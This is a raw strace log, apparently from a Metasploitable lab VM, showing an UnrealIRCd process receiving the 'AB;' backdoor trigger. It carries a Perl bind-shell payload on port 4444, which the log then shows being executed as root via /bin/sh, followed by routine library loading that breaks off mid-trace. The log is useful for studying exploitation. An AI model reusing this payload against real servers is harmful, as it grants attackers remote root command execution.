4519  07:32:15.440615 select(1024, [2 3 4 7 9], [], NULL, {0, 470000}) = 1 (in [2], left {0, 330000})

4519  07:32:15.579460 clock_gettime(CLOCK_MONOTONIC, {2345, 396496240}) = 0

4519  07:32:15.579497 accept(2, 0, NULL) = 5

4519  07:32:15.579518 getpeername(5, {sa_family=AF_INET, sin_port=htons(41161), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:32:15.579551 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:32:15.579564 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:32:15.579577 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:32:15.579589 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:32:15.579600 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:32:15.579611 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:32:15.579625 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:32:15.579641 clock_gettime(CLOCK_MONOTONIC, {2345, 396654454}) = 0

4519  07:32:15.579653 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:32:15.579664 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:32:15.579674 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:32:15.579683 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:32:15.579693 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:32:15.579709 send(6, "/\275\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:32:15.579816 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:32:15.579884 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n", 70, 0) = 70

4519  07:32:15.580043 gettimeofday({1495625535, 580048}, NULL) = 0

4519  07:32:15.580076 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {1, 0})

4519  07:32:15.584547 clock_gettime(CLOCK_MONOTONIC, {2345, 401564983}) = 0

4519  07:32:15.584578 recvfrom(6, "/\275\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0\"\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:32:15.584649 close(6)          = 0

4519  07:32:15.584665 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:32:15.584679 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 104, 0) = 104

4519  07:32:15.584873 time(NULL)        = 1495625535

4519  07:32:15.584891 time(NULL)        = 1495625535

4519  07:32:15.584923 gettimeofday({1495625535, 584928}, NULL) = 0

4519  07:32:15.584936 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:32:15.584965 clock_gettime(CLOCK_MONOTONIC, {2345, 401978031}) = 0

4519  07:32:15.584976 gettimeofday({1495625535, 584979}, NULL) = 0

4519  07:32:15.584986 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:32:15.585026 clock_gettime(CLOCK_MONOTONIC, {2345, 402038705}) = 0

4519  07:32:15.585037 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:32:15.585066 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:32:15.585086 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:32:15.585098 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:32:15.585113 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 10278

10278 07:32:15.585180 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

10278 07:32:15.585195 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

10278 07:32:15.585205 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10278 07:32:15.585219 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

10278 07:32:15.585342 brk(0)            = 0x80f9000

10278 07:32:15.585365 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10278 07:32:15.585403 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f79000

10278 07:32:15.585422 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

10278 07:32:15.585441 open("/etc/ld.so.cache", O_RDONLY) = 1

10278 07:32:15.585454 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10278 07:32:15.585473 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f71000

10278 07:32:15.585483 close(1)          = 0

10278 07:32:15.585494 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10278 07:32:15.585510 open("/lib/libncurses.so.5", O_RDONLY) = 1

10278 07:32:15.585523 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

10278 07:32:15.585618 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

10278 07:32:15.585636 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f41000

10278 07:32:15.585648 mmap2(0xb7f6e000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7f6e000

10278 07:32:15.585665 close(1)          = 0

10278 07:32:15.585677 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10278 07:32:15.585691 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

10278 07:32:15.585705 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

10278 07:32:15.585795 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

10278 07:32:15.585812 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f3d000

10278 07:32:15.585823 mmap2(0xb7f3f000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f3f000

10278 07:32:15.585839 close(1)          = 0

10278 07:32:15.585854 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10278 07:32:15.585868 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

10278 07:32:15.585889 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

10278 07:32:15.585980 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

10278 07:32:15.585997 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f3c000

10278 07:32:15.586011 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ded000

10278 07:32:15.586022 mmap2(0xb7f36000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f36000

10278 07:32:15.586037 mmap2(0xb7f39000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f39000

10278 07:32:15.586050 close(1)          = 0

10278 07:32:15.586073 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7dec000

10278 07:32:15.586085 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7dec6b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

10278 07:32:15.586149 mprotect(0xb7f36000, 4096, PROT_READ) = 0

10278 07:32:15.586185 munmap(0xb7f71000, 29913) = 0

10278 07:32:15.586211 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10278 07:32:15.586225 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

10278 07:32:15.586245 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf80d1d0) = -1 ENOTTY (Inappropriate ioctl for device)

10278 07:32:15.586276 brk(0)            = 0x80f9000

10278 07:32:15.586285 brk(0x80fa000)    = 0x80fa000

10278 07:32:15.586297 brk(0x80fb000)    = 0x80fb000

10278 07:32:15.586313 getuid32()        = 0

10278 07:32:15.586322 getgid32()        = 0

10278 07:32:15.586331 geteuid32()       = 0

10278 07:32:15.586340 getegid32()       = 0

10278 07:32:15.586353 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10278 07:32:15.586367 time(NULL)        = 1495625535

10278 07:32:15.586388 brk(0x80fc000)    = 0x80fc000

10278 07:32:15.586428 brk(0x80fd000)    = 0x80fd000

10278 07:32:15.586461 open("/proc/meminfo", O_RDONLY) = 1

10278 07:32:15.586483 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

10278 07:32:15.586501 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f78000

10278 07:32:15.586512 read(1, "MemTotal:      1035240 kB\nMemFree:        423096 kB\nBuffers:         76568 kB\nCached:         376432 kB\nSwapCached:          0 kB\nActive:         256344 kB\nInactive:       325624 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        422856 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            5168 kB\nWriteback:           0 kB\nAnonPages:      128968 kB\nMapped:          52008 kB\nSlab:            19088 kB\nSReclaimable:    10516 kB\nSUnreclaim:       8572 kB\nPageTables:       1960 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

10278 07:32:15.586600 close(1)          = 0

10278 07:32:15.586611 munmap(0xb7f78000, 4096) = 0

10278 07:32:15.586624 brk(0x80fe000)    = 0x80fe000

10278 07:32:15.586650 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

10278 07:32:15.586663 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

10278 07:32:15.586675 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10278 07:32:15.586687 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10278 07:32:15.586699 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

10278 07:32:15.586711 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

10278 07:32:15.586724 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10278 07:32:15.586736 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10278 07:32:15.586749 uname({sys="Linux", node="metasploitable", ...}) = 0

10278 07:32:15.586797 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

10278 07:32:15.586815 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10278 07:32:15.586833 brk(0x8100000)    = 0x8100000

10278 07:32:15.586852 getcwd("/etc/unreal", 4096) = 12

10278 07:32:15.586869 getpid()          = 10278

10278 07:32:15.586886 getppid()         = 4519

10278 07:32:15.586901 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10278 07:32:15.586921 stat64("/sbin/sh", 0xbf80d1a8) = -1 ENOENT (No such file or directory)

10278 07:32:15.586934 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

10278 07:32:15.586952 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

10278 07:32:15.586976 socket(PF_FILE, SOCK_STREAM, 0) = 1

10278 07:32:15.586989 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

10278 07:32:15.587001 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

10278 07:32:15.587022 close(1)          = 0

10278 07:32:15.587033 socket(PF_FILE, SOCK_STREAM, 0) = 1

10278 07:32:15.587043 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

10278 07:32:15.587054 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

10278 07:32:15.587072 close(1)          = 0

10278 07:32:15.587085 open("/etc/nsswitch.conf", O_RDONLY) = 1

10278 07:32:15.587099 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

10278 07:32:15.587115 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f78000

10278 07:32:15.587127 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

10278 07:32:15.587176 read(1, "", 4096) = 0

10278 07:32:15.587186 close(1)          = 0

10278 07:32:15.587195 munmap(0xb7f78000, 4096) = 0

10278 07:32:15.587211 open("/etc/ld.so.cache", O_RDONLY) = 1

10278 07:32:15.587223 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10278 07:32:15.587240 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f71000

10278 07:32:15.587250 close(1)          = 0

10278 07:32:15.587260 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10278 07:32:15.587275 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

10278 07:32:15.587291 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

10278 07:32:15.587450 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

10278 07:32:15.587469 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7de3000

10278 07:32:15.587482 mmap2(0xb7dea000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7dea000

10278 07:32:15.587499 close(1)          = 0

10278 07:32:15.587511 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10278 07:32:15.587525 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

10278 07:32:15.587540 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

10278 07:32:15.587627 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

10278 07:32:15.587644 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dcb000

10278 07:32:15.587655 mmap2(0xb7ddf000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7ddf000

10278 07:32:15.587670 mmap2(0xb7de1000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7de1000

10278 07:32:15.587684 close(1)          = 0

10278 07:32:15.587712 munmap(0xb7f71000, 29913) = 0

10278 07:32:15.587729 open("/etc/ld.so.cache", O_RDONLY) = 1

10278 07:32:15.587742 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10278 07:32:15.587758 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f71000

10278 07:32:15.587768 close(1)          = 0

10278 07:32:15.587779 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10278 07:32:15.587794 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

10278 07:32:15.587808 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

10278 07:32:15.587938 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

10278 07:32:15.587956 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dc1000

10278 07:32:15.587968 mmap2(0xb7dc9000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7dc9000

10278 07:32:15.587985 close(1)          = 0

10278 07:32:15.587997 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

